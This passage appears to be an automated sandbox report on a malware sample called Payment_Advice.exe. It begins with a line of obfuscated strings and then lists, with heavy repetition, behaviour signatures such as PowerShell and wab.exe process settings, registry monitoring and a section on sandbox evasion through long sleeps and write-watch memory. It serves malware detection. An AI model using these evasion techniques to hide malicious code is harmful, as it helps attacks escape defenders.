sitorHComprisiLurmrkegArbejdshcirrhu lUdenlanoLnf rbewda olin Affrend'CharlybBRhipidoC Svanek9Sibe ic6 Bassan9RundvisCBounde,9NonfarmBBrusure8.ngeridA.orsoni8Villigt2ServiceC Sniffe1 Solsti8Uns.aleB Krater8Clearmi3O ganon8Trusser3 Anti,l'Adresse;bystens`$GaloplbFU,deligimonotoct Del,stzA.aplasw GrafikaChoripetAnoesise Hovedar Antiri=SorehonH FerrariCoostbagPackplahThessallVdr ttwoSkru,skwRhythmd .oodled'indkberAGos.ell2Splayda8Busgade6Higgleh8HypnotiCpiuria.9HomogenDZygosis8Trommes0 Gennem9G,sblusC Elemen8O twait0Rustica8For mte9Dronep 9MineralBHydromeCTilhu,g1 ExternBAkkredi8Tungmet8 pinkel6Porce.n8 Sifflo1ScavageDGrkerenCTransm DKompostDInterflCUnflawe1
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 48A47E9
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 28B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 21680000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 23680000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599872 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598531 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598422 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598312 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598203 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598094 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597984 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597516 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597186 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 597078 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596969 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596859 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596750 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596516 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596391 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596172 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 596062 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595953 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595734 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595625 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595515 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595406 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595297 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595187 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 595064 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594937 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594609 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 594500 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5941 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3772 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 1338 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 8509 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -32281802128991695s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599872s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4124 Thread sleep count: 1338 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4124 Thread sleep count: 8509 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599764s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598891s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598766s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598641s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598531s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598422s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598312s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598203s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -598094s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597984s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597766s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597641s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597516s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597406s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597297s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597186s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -597078s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596969s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596859s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596750s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596641s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596516s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596391s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596281s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596172s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -596062s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595953s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595844s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595734s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595625s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595515s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595406s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595297s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595187s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -595064s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -594718s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260 Thread sleep time: -594500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405770
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_0040622B FindFirstFileW,FindClose, 0_2_0040622B
Source: C:\Users\user\Desktop\Payment_Advice.exe Code function: 0_2_0040276E FindFirstFileW, 0_2_0040276E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599872 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599764 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598891 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 598766 Jump to behavior
